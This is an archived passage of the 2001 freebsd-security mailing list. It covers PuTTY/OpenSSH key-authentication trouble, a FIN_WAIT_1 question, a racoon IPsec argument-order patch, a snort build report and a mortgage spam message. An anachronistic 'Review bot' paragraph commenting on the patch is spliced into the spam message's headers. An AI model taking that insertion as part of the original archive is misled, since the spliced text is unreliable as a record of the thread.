> Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; > client software version PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for > protocol 2.0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string > SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > diffie-hellman-group1-sha1 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: server->client 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait 
SSH2_MSG_KEXDH_INIT. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. > Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: > Connection reset by peer > Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup > 0x805e72c(0x0) > > Any pointers would be highly appreciated Tom > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 10:39:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id B4AD837B403 for ; Fri, 26 Oct 2001 10:39:06 -0700 (PDT) Received: (qmail 24650 invoked by uid 1000); 26 Oct 2001 17:39:05 -0000 Date: Fri, 26 Oct 2001 19:39:05 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026193905.A24636@heresy.dreamflow.nl> Reply-To: Bart Matthaei References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> <20011026175209.A24453@heresy.dreamflow.nl> <20011026120745.A7897@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026120745.A7897@corona.cs.wm.edu>; from 
zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 12:07:46PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 12:07:46PM -0400, Zvezdan Petkovic wrote: [snip] > Wasn't intended as a flame. Sorry if somebody perceived it that way. I didn't. I just wanted to make sure no windows sucks discussion would start with this post :) > If you look at the thread you'll see that I tried to offer some > constructive advice on how to convert between OpenSSH<->SECSH pub key > formats. That might, or might not have been helpful to the original > poster. I know :) It wasn't meant to offend.. You're doing a great job ;) > You sound as an adult reprimanding a kid who's smirking at people. > I'm using UNIX for over 12 years, and that is a "natural habitat" for > me. _I_ would probably be in a lot of grief trying to switch to Win. > That definitely does _not_ necessarily hold for other people. Like I said.. I wasn't reprimanding :) I was only covering my ass from getting loads of windows sucks spam in my mailbox ;) > I'm sorry for misunderstanding. There wasn't any ;) Regards, Bart -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. 
You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 11:15: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from web11803.mail.yahoo.com (web11803.mail.yahoo.com [216.136.172.157]) by hub.freebsd.org (Postfix) with SMTP id E57E037B401 for ; Fri, 26 Oct 2001 11:15:01 -0700 (PDT) Message-ID: <20011026181501.39456.qmail@web11803.mail.yahoo.com> Received: from [64.73.64.94] by web11803.mail.yahoo.com via HTTP; Fri, 26 Oct 2001 11:15:01 PDT Date: Fri, 26 Oct 2001 11:15:01 -0700 (PDT) From: X Philius Reply-To: xphilius@yahoo.com Subject: Free SSH2 client for Windows that actually works with DSA public key auth To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Folks, This is in reference to the recent posts about Putty and SSH etc. I have been using a free windows client (I guess really a DOS client) to access my FreeBSD box, and as the subject suggests, it seems to work fine with SSH2, and DSA public key authentication. I have not managed to get any of the other free clients mentioned to work with DSA public key auth, except for this one. Only drawback is that there is no GUI, but with this crowd, that is hardly a drawback ;-) In any case, I have no idea how reputable these folks are, I found this randomly searching the web, but the client works exactly like Open SSH on FreeBSD (it is based on the cygwin dll, I believe), and I even used the key-gen utility on my PC to make the key. The only prob I have is that the termcap settings he provides don't work quite right, vi gets weird sometimes. I'll post a question about termcap settings on the questions list. Here's the link to the site. 
http://www.networksimplicity.com/ Jason To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 11:30:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from web14606.mail.yahoo.com (web14606.mail.yahoo.com [216.136.224.86]) by hub.freebsd.org (Postfix) with SMTP id CB70037B407 for ; Fri, 26 Oct 2001 11:30:37 -0700 (PDT) Message-ID: <20011026183037.11581.qmail@web14606.mail.yahoo.com> Received: from [66.156.9.33] by web14606.mail.yahoo.com via HTTP; Fri, 26 Oct 2001 11:30:37 PDT Date: Fri, 26 Oct 2001 11:30:37 -0700 (PDT) From: Jerry Murdock Subject: Re: Free SSH2 client for Windows that actually works with DSA public key auth To: xphilius@yahoo.com, freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Folks, > This is in reference to the recent posts about Putty and SSH etc. I > have been using a free windows client (I guess really a DOS client) to > access my FreeBSD box, and as the subject suggests, it seems to work > fine with SSH2, and DSA public key authentication. I have not managed > to get any of the other free clients mentioned to work with DSA public > key auth, except for this one. Only drawback is that there is no GUI, > but with this crowd, that is hardly a drawback ;-) In any case, I have > no idea how reputable these folks are, I found this randomly searching > the web, but the client works exactly like Open SSH on FreeBSD (it is > based on the cygwin dll, I believe), and I even used the key-gen > utility on my PC to make the key. 
The only prob I have is that the > termcap settings he provides don't work quite right, vi gets weird > sometimes. I'll post a question about termcap settings on the questions > list. Here's the link to the site. > > http://www.networksimplicity.com/ > > Jason Also, I use Cygwin's RXVT (and xterm - but doesn't require x be installed with Cygwin), and the OpenSSH included with CygWin.1 Works great. www.cygwin.com Jerry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 12:53:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.chartertn.net (smtp1.chartertn.net [24.158.96.12]) by hub.freebsd.org (Postfix) with SMTP id B395737B405 for ; Fri, 26 Oct 2001 12:53:34 -0700 (PDT) Received: (qmail 59370 invoked from network); 26 Oct 2001 19:19:48 -0000 Received: from jc-c-24-158-136-130.chartertn.net (HELO 2xyyg01) (24.158.136.130) by smtp1.chartertn.net with SMTP; 26 Oct 2001 19:19:48 -0000 Message-ID: <000a01c15e6a$f1ed7560$82889e18@chartertn.net> From: "Xhemile Qosja" To: Subject: Date: Fri, 26 Oct 2001 15:09:55 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C15E30.44EFEC60" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C15E30.44EFEC60 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable why FIN_WAIT_1 is a potential security hole? 
------=_NextPart_000_0007_01C15E30.44EFEC60-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 13: 5:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail1.toronto.istar.net (mail1.toronto.istar.net [209.89.75.17]) by hub.freebsd.org (Postfix) with ESMTP id 62BFE37B401 for ; Fri, 26 Oct 2001 13:05:39 -0700 (PDT) Received: from d141-119-162.home.cgocable.net ([24.141.119.162] helo=x1-6-00-50-ba-de-36-33.kico1.on.home.com) by mail1.toronto.istar.net with esmtp (Exim 2.02 #1) id 15xDEX-0006oV-00; Fri, 26 Oct 2001 16:05:37 -0400 Received: from localhost (genisis@localhost) by x1-6-00-50-ba-de-36-33.kico1.on.home.com (8.11.6/8.11.6) with ESMTP id f9QKBKh13269; Fri, 26 Oct 2001 16:11:20 -0400 (EDT) (envelope-from genisis@istar.ca) X-Authentication-Warning: x1-6-00-50-ba-de-36-33.kico1.on.home.com: genisis owned process doing -bs Date: Fri, 26 Oct 2001 16:09:56 -0400 (EDT) 
From: Dru X-X-Sender: To: Xhemile Qosja Cc: Subject: Re: your mail In-Reply-To: <000a01c15e6a$f1ed7560$82889e18@chartertn.net> Message-ID: <20011026160913.O13236-100000@x1-6-00-50-ba-de-36-33.kico1.on.home.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Xhemile Qosja wrote: > why FIN_WAIT_1 is a potential security hole? > A quick google search reveals this link: http://cert.uni-stuttgart.de/archive/bugtraq/2001/07/msg00544.html Dru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 16: 9:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from boromir.vpop.net (dns1.vpop.net [206.117.147.2]) by hub.freebsd.org (Postfix) with ESMTP id 0523437B403 for ; Fri, 26 Oct 2001 16:09:44 -0700 (PDT) Received: from vpop.net (bilbo.vpop.net [63.231.252.113]) by boromir.vpop.net (8.11.4/8.11.4) with ESMTP id f9QN9cR96969; Fri, 26 Oct 2001 16:09:39 -0700 (PDT) (envelope-from mreimer@vpop.net) Message-ID: <3BD9EDE2.9944FB32@vpop.net> Date: Fri, 26 Oct 2001 18:12:34 -0500 
From: Matthew Reimer Organization: VPOP Technologies, Inc. X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: Racoon IPSEC issues References: Content-Type: multipart/mixed; boundary="------------63E07C416784556870518E97" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------63E07C416784556870518E97 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Attached is a simple patch that fixes it for me. Matt Colin Legendre wrote: > > I started having this problem with a win2k-freebsd4.4 setup. It was working > fine until I upgraded racoon from 20010831a to 20011016a then this problem > started. > > BTW any idea how to roll back to racoon 20010831a? > > Colin Legendre CCNA, MCP > sudz@ns3g.com > http://www.ns3g.com > > -----Original Message----- 
> From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Eric Anderson > Sent: Thursday, September 06, 2001 10:03 AM > To: freebsd-security@FreeBSD.ORG > Subject: Racoon IPSEC issues > > Ok, I have been setting up VPN's using IPSEC tunnel mode (ESP) with > Racoon on FreeBSD 4.2 for some time now. I have 4 currently running > just fine, and the 3 newest VPN don't work. It appears as though the > Racoon's aren't talking to each other correctly. I have 1 VPN "server" > that all the clients connect to, and the clients are small machines > running from compact flash cards (a stripped down 30Mb freebsd 4.2 > setup). I use the GIF interfaces to connect the vpn's together. I have > gif0,1,3,4 are connected to VPN's that are up and running. Not that the > gif's have anything to do with it, just extra info. Is there something > I'm missing? I have tried configuring the non-working boxes just like > the working ones, etc. I'm out of ideas! > > Here are some blurps from my logs on the vpn "server" box: > > 2001-09-06 08:51:55: INFO: isakmp.c:965:isakmp_ph2begin_r(): responde > new phase 2 negotiation: xx.yy.zz.60[0]<=>xx.yy.zz.128[0] > 2001-09-06 08:51:55: ERROR: proposal.c:951:set_proposal_from_policy(): > not supported nested SA. Ignore. > 2001-09-06 08:51:55: ERROR: proposal.c:999:set_proposal_from_policy(): > There is a difference between the in/out bound policies. > 2001-09-06 08:51:55: ERROR: isakmp_quick.c:1901:get_proposal_r(): failed > to create saprop. > 2001-09-06 08:51:55: ERROR: isakmp_quick.c:1025:quick_r1recv(): failed > to get proposal for responder. > 2001-09-06 08:51:55: ERROR: isakmp.c:975:isakmp_ph2begin_r(): failed to > pre-process packet. > 2001-09-06 08:52:00: INFO: isakmp.c:1618:isakmp_post_acquire(): request > for establishing IPsec-SA was queued due to no phase1 found. 
> 2001-09-06 08:52:19: INFO: isakmp.c:854:isakmp_ph1begin_r(): responde > new phase 1 negotiation: xx.yy.zz.60[500]<=>xx.yy.zz.128[500] > 2001-09-06 08:52:19: INFO: isakmp.c:859:isakmp_ph1begin_r(): begin > Aggressive mode. > 2001-09-06 08:52:20: INFO: isakmp.c:2313:log_ph1established(): ISAKMP-SA > established xx.yy.zz.60[500]-xx.yy.zz.128[500] spi:9c0e0730a89724fc:3 > 4e869a34c12cf49 > 2001-09-06 08:52:21: INFO: isakmp.c:965:isakmp_ph2begin_r(): responde > new phase 2 negotiation: xx.yy.zz.60[0]<=>xx.yy.zz.128[0] > 2001-09-06 08:52:21: ERROR: proposal.c:951:set_proposal_from_policy(): > not supported nested SA. Ignore. > 2001-09-06 08:52:21: ERROR: proposal.c:999:set_proposal_from_policy(): > There is a difference between the in/out bound policies. > 2001-09-06 08:52:21: ERROR: isakmp_quick.c:1901:get_proposal_r(): failed > to create saprop. > 2001-09-06 08:52:21: ERROR: isakmp_quick.c:1025:quick_r1recv(): failed > to get proposal for responder. > 2001-09-06 08:52:21: ERROR: isakmp.c:975:isakmp_ph2begin_r(): failed to > pre-process packet. > 2001-09-06 08:52:32: INFO: isakmp.c:1618:isakmp_post_acquire(): request > for establishing IPsec-SA was queued due to no phase1 found. > 2001-09-06 08:52:32: ERROR: isakmp.c:1676:isakmp_chkph1there(): phase1 > negotiation failed due to time up. > 2001-09-06 08:52:32: INFO: isakmp.c:1678:isakmp_chkph1there(): delete > phase 2 handler. > > Help please! > > -- > ---------------------------------------------------------------------------- > --- > Eric Anderson anderson@centtech.com Centaur Technology (512) > 418-5792 > Truth is more marvelous than mystery. 
> ---------------------------------------------------------------------------- > --- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --------------63E07C416784556870518E97 Content-Type: text/plain; charset=us-ascii; name="isakmp_quick.c.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="isakmp_quick.c.patch" --- isakmp_quick.c.orig Fri Oct 26 15:51:14 2001 +++ isakmp_quick.c Fri Oct 26 15:51:30 2001 @@ -2017,7 +2017,7 @@ } /* set new proposal derived from a policy into the iph2->proposal. */ - if (set_proposal_from_policy(iph2, sp_in, sp_out) < 0) { + if (set_proposal_from_policy(iph2, sp_out, sp_in) < 0) { plog(LLV_ERROR, LOCATION, NULL, "failed to create saprop.\n"); return ISAKMP_INTERNAL_ERROR; --------------63E07C416784556870518E97-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 23: 6:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp3.mx.pitdc1.stargate.net (smtp3.mx.pitdc1.stargate.net [206.210.69.143]) by hub.freebsd.org (Postfix) with SMTP id E48E437B403 for ; Fri, 26 Oct 2001 23:06:34 -0700 (PDT) Received: (qmail 2746 invoked from network); 27 Oct 2001 06:06:27 -0000 Received: from unknown (HELO localhost) (63.48.180.58) by smtp3.mx.pitdc1.stargate.net with SMTP; 27 Oct 2001 06:06:27 -0000 X-Sender: kanderson@stargate.net 
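Review bot: the call at isakmp_quick.c line 2017 now passes sp_out before sp_in, but nothing in the hunk says which order set_proposal_from_policy() expects, so the corrected call reads as arbitrarily as the one it replaces. A one-line comment above the call naming the parameter order would keep the arguments from being transposed again. The patch should also state which racoon revision it is against: the "failed to create saprop" error in the quoted log is reported at isakmp_quick.c:1901 in get_proposal_r(), while this hunk sits at line 2017. Before it is applied, confirm on the responder that the "There is a difference between the in/out bound policies" error from proposal.c:999 no longer appears, and check that any other caller of set_proposal_from_policy() passes its policies in the order the function expects.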
From: Kevin Anderson To: "Mortgage Borrower" Date: Fri, 26 Oct 2001 23:16:42 -0700 Subject: Need a Home Loan? Let Us Help! Reply-To: kanderson@stargate.net MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001__323262915_83802.79" Message-Id: <20011027060634.E48E437B403@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a Multipart MIME message. ------=_NextPart_000_001__323262915_83802.79 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit ------=_NextPart_000_001__323262915_83802.79 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: base64
------=_NextPart_000_001__323262915_83802.79-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 27 2:32: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 680DA37B401 for ; Sat, 27 Oct 2001 02:32:00 -0700 (PDT) Received: (qmail 42263 invoked from network); 27 Oct 2001 09:31:58 -0000 Received: from pec-69-112.tnt4.m2.uunet.de (HELO laptop) (149.225.69.112) by relay1.pair.com with
SMTP; 27 Oct 2001 09:31:58 -0000 X-pair-Authenticated: 149.225.69.112 Message-ID: <005501c15eca$4a47aaa0$0901a8c0@system> From: "Tom Beer" To: Cc: References: <006801c15dee$471d80c0$0901a8c0@system> <3BD99429.FEC70F35@quadtelecom.com> Subject: Re: Putty & SSH Date: Sat, 27 Oct 2001 11:30:49 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi,

first thanks for all the considerations!

>
> Is putty configured to provide your logon name, and the identity
> file's location.

Yes. I provide the logon name and the BSD generated logon key, but every time authentication fails, claiming that there is no other login operation permitted, which is intended. So I try to find another SSH Client, which will give me SSH2 support. I'll try starting with Cygwin.

Thanks a lot
Tom

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 27 8:25:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from ct980320-b.blmngtn1.in.home.com (ct980320-b.blmngtn1.in.home.com [65.8.207.32]) by hub.freebsd.org (Postfix) with ESMTP id 44B4337B40D for ; Sat, 27 Oct 2001 08:25:08 -0700 (PDT) Received: (from mikes@localhost) by ct980320-b.blmngtn1.in.home.com (8.11.6/8.11.4) id f9RFP2B22855; Sat, 27 Oct 2001 10:25:02 -0500 (EST) (envelope-from mikes)
From: Mike Squires Message-Id: <200110271525.f9RFP2B22855@ct980320-b.blmngtn1.in.home.com> Subject: FreeBSD-4.4 STABLE + snort 1.8.2 beta (10/26) Build 85 OK To: snort-devel@lists.sourceforge.net Date: Sat, 27 Oct 2001 10:25:02 -0500 (EST) Cc: Snort Users , freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I installed 1.8.2 beta (Build 85) with associated rules files (also downloaded 10/26) on a PII/300 running FreeBSD 4.4-STABLE (recompiled 10/12) and snort has been running for 24 hours, no problems. I used the standard FreeBSD configure options (no MySQL, no ODBC, no PostgreSQL).

1.8.1-RELEASE crashes (segmentation error) in from 10 minutes to a day or so, depending on which rules file or set of rules files I use.

Mike Squires

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message